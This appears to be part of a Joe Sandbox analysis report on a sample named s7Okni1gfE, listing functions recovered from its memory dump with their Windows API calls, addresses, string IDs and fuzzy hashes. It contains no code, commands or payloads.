                                            • GetAsyncKeyState.USER32(00000012), ref: 0084301B
                                            • GetKeyState.USER32(00000012), ref: 00843029
                                            • GetAsyncKeyState.USER32(0000005B), ref: 00843052
                                            • GetKeyState.USER32(0000005B), ref: 00843060
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: State$Async$Keyboard
                                            • String ID:
                                            • API String ID: 541375521-0
                                            • Opcode ID: 95f3c898c65220e5d1736fa7223af740999b05fd6137daff0c081c40871f41ce
                                            • Instruction ID: 09f6649470d0a54c1bb4499956a03e59b3a15350fbb7c88eb17c2997d6969b39
                                            • Opcode Fuzzy Hash: 95f3c898c65220e5d1736fa7223af740999b05fd6137daff0c081c40871f41ce
                                            • Instruction Fuzzy Hash: 2751C860608B9C29FB35EBA488517EABFF4FF11340F88459AD5C2D61C3DA549B4CC762
                                            Function 0083ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,00000001), ref: 0083ED1E
                                            • GetWindowRect.USER32(00000000,?), ref: 0083ED30
                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0083ED8E
                                            • GetDlgItem.USER32(?,00000002), ref: 0083ED99
                                            • GetWindowRect.USER32(00000000,?), ref: 0083EDAB
                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0083EE01
                                            • GetDlgItem.USER32(?,000003E9), ref: 0083EE0F
                                            • GetWindowRect.USER32(00000000,?), ref: 0083EE20
                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0083EE63
                                            • GetDlgItem.USER32(?,000003EA), ref: 0083EE71
                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0083EE8E
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0083EE9B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$ItemMoveRect$Invalidate
                                            • String ID:
                                            • API String ID: 3096461208-0
                                            • Opcode ID: c5f692947655d342cc7498233b03e519ecd033b6329cee6dc1006e28ed39f19b
                                            • Instruction ID: 554dfee4bf40d9b847a8b538c39b8f1f96d9edfe2fe48cb32dabf1e2e8234d8f
                                            • Opcode Fuzzy Hash: c5f692947655d342cc7498233b03e519ecd033b6329cee6dc1006e28ed39f19b
                                            • Instruction Fuzzy Hash: 8B51FCB1B00209AFDB18DF6DDD85AAEBBBAFB98710F148129F519D72D0E7709D008B50
                                            Function 0081B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0081B759,?,00000000,?,?,?,?,0081B72B,00000000,?), ref: 0081BA58
                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0081B72B), ref: 0081B7F6
                                            • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0081B72B,00000000,?,?,0081B2EF,?,?), ref: 0081B88D
                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0087D8A6
                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0081B72B,00000000,?,?,0081B2EF,?,?), ref: 0087D8D7
                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0081B72B,00000000,?,?,0081B2EF,?,?), ref: 0087D8EE
                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0081B72B,00000000,?,?,0081B2EF,?,?), ref: 0087D90A
                                            • DeleteObject.GDI32(00000000), ref: 0087D91C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                            • String ID:
                                            • API String ID: 641708696-0
                                            • Opcode ID: bd1b5eee8ae705f3304338356ab6ed7af00cf99cb69f9661183e7f1a14c52e28
                                            • Instruction ID: 167102d00c5f50ca753de43924a86a58785f9e10689a38986a15ebaf34671083
                                            • Opcode Fuzzy Hash: bd1b5eee8ae705f3304338356ab6ed7af00cf99cb69f9661183e7f1a14c52e28
                                            • Instruction Fuzzy Hash: 8E618A30500705CFDB259F18D988FA5BBF9FFA5726F14892DE14AC6AA4C730A8D0DB81
                                            Function 0081B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081B526: GetWindowLongW.USER32(?,000000EB), ref: 0081B537
                                            • GetSysColor.USER32(0000000F), ref: 0081B438
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ColorLongWindow
                                            • String ID:
                                            • API String ID: 259745315-0
                                            • Opcode ID: ea00d98cd91392fd622ab6ef28dc3ad4f1eed28afc87b49708c9376b625f5191
                                            • Instruction ID: 4e82925f5d6e5874771c0f6a4109a4c1a17a9185211617ac6ea0089716238367
                                            • Opcode Fuzzy Hash: ea00d98cd91392fd622ab6ef28dc3ad4f1eed28afc87b49708c9376b625f5191
                                            • Instruction Fuzzy Hash: 54418C35100244ABDF216F68D889BF93B6AFF56731F188261F965CA1E6D7308C81DB25
                                            Function 0084690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                            • String ID:
                                            • API String ID: 136442275-0
                                            • Opcode ID: d191b02bf16b7361763a24a0b9ed5b67f71579d2b61eb0ac8ba63cc25b39c1dc
                                            • Instruction ID: 375e8e053c5b9bae168059edb846f13d9045ba29ac609120205aa4f9238c59e9
                                            • Opcode Fuzzy Hash: d191b02bf16b7361763a24a0b9ed5b67f71579d2b61eb0ac8ba63cc25b39c1dc
                                            • Instruction Fuzzy Hash: 00410C7684512CAFCF61EA94DC85DCA73BCFB44310F0041A7B659E2151EA70ABE48F56
                                            Function 0084D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                            Download Yara Rule
                                            APIs
                                            • CharLowerBuffW.USER32(0089DC00,0089DC00,0089DC00), ref: 0084D7CE
                                            • GetDriveTypeW.KERNEL32(?,008B3A70,00000061), ref: 0084D898
                                            • _wcscpy.LIBCMT ref: 0084D8C2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BuffCharDriveLowerType_wcscpy
                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                            • API String ID: 2820617543-1000479233
                                            • Opcode ID: 198e4aae6ae55d30e862af51551c024f772a9fcf126b34cc5f6cd123a84c92c4
                                            • Instruction ID: 8a3d26515655a03d8cec18eee7a5aaf3c9d6084e330a1991471d0b25a106d770
                                            • Opcode Fuzzy Hash: 198e4aae6ae55d30e862af51551c024f772a9fcf126b34cc5f6cd123a84c92c4
                                            • Instruction Fuzzy Hash: 87516235114309AFC710EF18DC91AAEB7A5FF94314F20892DF99AD72A2DB31DD49CA42
                                            Function 0080936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                            Download Yara Rule
                                            APIs
                                            • __swprintf.LIBCMT ref: 008093AB
                                            • __itow.LIBCMT ref: 008093DF
                                              • Part of subcall function 00821557: _xtow@16.LIBCMT ref: 00821578
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __itow__swprintf_xtow@16
                                            • String ID: %.15g$0x%p$False$True
                                            • API String ID: 1502193981-2263619337
                                            • Opcode ID: 8be6dabbb6b0ff8e6024bd4db12bdb59531223a55fb7c7d74226489b3d991fc9
                                            • Instruction ID: 08ac36fc73df00978151f9baed946e28548d9bae349a78d01a8d4207a40f254d
                                            • Opcode Fuzzy Hash: 8be6dabbb6b0ff8e6024bd4db12bdb59531223a55fb7c7d74226489b3d991fc9
                                            • Instruction Fuzzy Hash: 7941B371504208AFDB64DF78DD42EAA73E8FF84304F20946AE58AD72D6EB31D981CB51
                                            Function 0086A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0086A259
                                            • CreateCompatibleDC.GDI32(00000000), ref: 0086A260
                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0086A273
                                            • SelectObject.GDI32(00000000,00000000), ref: 0086A27B
                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0086A286
                                            • DeleteDC.GDI32(00000000), ref: 0086A28F
                                            • GetWindowLongW.USER32(?,000000EC), ref: 0086A299
                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0086A2AD
                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0086A2B9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                            • String ID: static
                                            • API String ID: 2559357485-2160076837
                                            • Opcode ID: 262439434a3ba723bcd651b264d32b64224712b62918d222a190fd991d84aafb
                                            • Instruction ID: d324b428debfd1569f5c7b396dfdd53ed87f3f96086f2b2fdfc426330f83583d
                                            • Opcode Fuzzy Hash: 262439434a3ba723bcd651b264d32b64224712b62918d222a190fd991d84aafb
                                            • Instruction Fuzzy Hash: 17318B31140218ABDF259FA8DC49FEA3B69FF1A364F110214FA19E61E0C736D811DBA5
                                            Function 00846F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                            • String ID: 0.0.0.0
                                            • API String ID: 2620052-3771769585
                                            • Opcode ID: 56c8912ce9817b5e69357c9bc3a8419ef936ae13a7dec5aa9a82aa1c9851cc64
                                            • Instruction ID: 417216a83ad0b606d4a9cad981f4c55093ed82ca059303bd64c000257d052f44
                                            • Opcode Fuzzy Hash: 56c8912ce9817b5e69357c9bc3a8419ef936ae13a7dec5aa9a82aa1c9851cc64
                                            • Instruction Fuzzy Hash: 6E11E47150421CAFDB24BB68AC4AEDA77ACFF41710F040166F145E6092FF74AE858B52
                                            Function 0082500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00825047
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            • __gmtime64_s.LIBCMT ref: 008250E0
                                            • __gmtime64_s.LIBCMT ref: 00825116
                                            • __gmtime64_s.LIBCMT ref: 00825133
                                            • __allrem.LIBCMT ref: 00825189
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008251A5
                                            • __allrem.LIBCMT ref: 008251BC
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008251DA
                                            • __allrem.LIBCMT ref: 008251F1
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0082520F
                                            • __invoke_watson.LIBCMT ref: 00825280
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                            • String ID:
                                            • API String ID: 384356119-0
                                            • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                            • Instruction ID: fd6827e5cd5464d3be0c61d59cdecb92c24db60889d50650e6dc3eae08bf1fe1
                                            • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                            • Instruction Fuzzy Hash: 7C71D672A41F26ABE714AE7DDC41B6A77A8FF44764F144229F810D62C1E770DD808BD1
                                            Function 00844DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00844DF8
                                            • GetMenuItemInfoW.USER32(008C1708,000000FF,00000000,00000030), ref: 00844E59
                                            • SetMenuItemInfoW.USER32(008C1708,00000004,00000000,00000030), ref: 00844E8F
                                            • Sleep.KERNEL32(000001F4), ref: 00844EA1
                                            • GetMenuItemCount.USER32(?), ref: 00844EE5
                                            • GetMenuItemID.USER32(?,00000000), ref: 00844F01
                                            • GetMenuItemID.USER32(?,-00000001), ref: 00844F2B
                                            • GetMenuItemID.USER32(?,?), ref: 00844F70
                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00844FB6
                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00844FCA
                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00844FEB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                            • String ID:
                                            • API String ID: 4176008265-0
                                            • Opcode ID: a88bf70cbe33a794fe9340eb4084c0bb8ec83e7b783717394e035c52934d89c8
                                            • Instruction ID: 050f1ff974c9073b6ab6285423c9bcbdac11b3782f645026160db5d75263c38e
                                            • Opcode Fuzzy Hash: a88bf70cbe33a794fe9340eb4084c0bb8ec83e7b783717394e035c52934d89c8
                                            • Instruction Fuzzy Hash: 7561907190024DAFDF11CFA8D888EAE7BB8FB01308F14115AF841E7291DB31AD49CB21
                                            Function 00869C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00869C98
                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00869C9B
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00869CBF
                                            • _memset.LIBCMT ref: 00869CD0
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00869CE2
                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00869D5A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$LongWindow_memset
                                            • String ID:
                                            • API String ID: 830647256-0
                                            • Opcode ID: 82c405840f52630a57ff4455bc1f73d0c3c05fea1d8d495909869be4103ddbe7
                                            • Instruction ID: 35b841d2c1531b86d7fe02e3cee5db52e59a2f4cd02e63deef684114f6cf6d16
                                            • Opcode Fuzzy Hash: 82c405840f52630a57ff4455bc1f73d0c3c05fea1d8d495909869be4103ddbe7
                                            • Instruction Fuzzy Hash: F8617A75A00208AFDB10DFA8CC81EEEB7B8FB09714F154169FA54E72D2D774A941DB50
                                            Function 008394E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 008394FE
                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00839549
                                            • VariantInit.OLEAUT32(?), ref: 0083955B
                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 0083957B
                                            • VariantCopy.OLEAUT32(?,?), ref: 008395BE
                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 008395D2
                                            • VariantClear.OLEAUT32(?), ref: 008395E7
                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 008395F4
                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008395FD
                                            • VariantClear.OLEAUT32(?), ref: 0083960F
                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0083961A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                            • String ID:
                                            • API String ID: 2706829360-0
                                            • Opcode ID: adffedcb94437308337d75df4c5d10665fd878cd34e2315212861d9b8d28e60d
                                            • Instruction ID: 1d3228dc9b466692b036e249587ce70a184fd17999c258b3fadaf5855b869e9a
                                            • Opcode Fuzzy Hash: adffedcb94437308337d75df4c5d10665fd878cd34e2315212861d9b8d28e60d
                                            • Instruction Fuzzy Hash: E9414C31900219EFCF01EFA8D8849DEBB79FF48354F008069E542E7261DB70EA85CBA5
                                            Function 0085ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0080936C: __swprintf.LIBCMT ref: 008093AB
                                              • Part of subcall function 0080936C: __itow.LIBCMT ref: 008093DF
                                            • CoInitialize.OLE32 ref: 0085ADF6
                                            • CoUninitialize.OLE32 ref: 0085AE01
                                            • CoCreateInstance.OLE32(?,00000000,00000017,0088D8FC,?), ref: 0085AE61
                                            • IIDFromString.OLE32(?,?), ref: 0085AED4
                                            • VariantInit.OLEAUT32(?), ref: 0085AF6E
                                            • VariantClear.OLEAUT32(?), ref: 0085AFCF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                            • API String ID: 834269672-1287834457
                                            • Opcode ID: a6399038a65ca8245457aa24bec0efeb9584d62947f0d246942a0539317ddafb
                                            • Instruction ID: 114fd3cafe0701915cf150c38e41a66a50ac4bb04775b0542a9e3a7d6ee9c9ca
                                            • Opcode Fuzzy Hash: a6399038a65ca8245457aa24bec0efeb9584d62947f0d246942a0539317ddafb
                                            • Instruction Fuzzy Hash: 5B617A712083119FC714EF58C889A6ABBE8FF48715F004A19F985DB292CB70ED48CB93
                                            Function 00858107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WSAStartup.WSOCK32(00000101,?), ref: 00858168
                                            • inet_addr.WSOCK32(?,?,?), ref: 008581AD
                                            • gethostbyname.WSOCK32(?), ref: 008581B9
                                            • IcmpCreateFile.IPHLPAPI ref: 008581C7
                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00858237
                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0085824D
                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008582C2
                                            • WSACleanup.WSOCK32 ref: 008582C8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
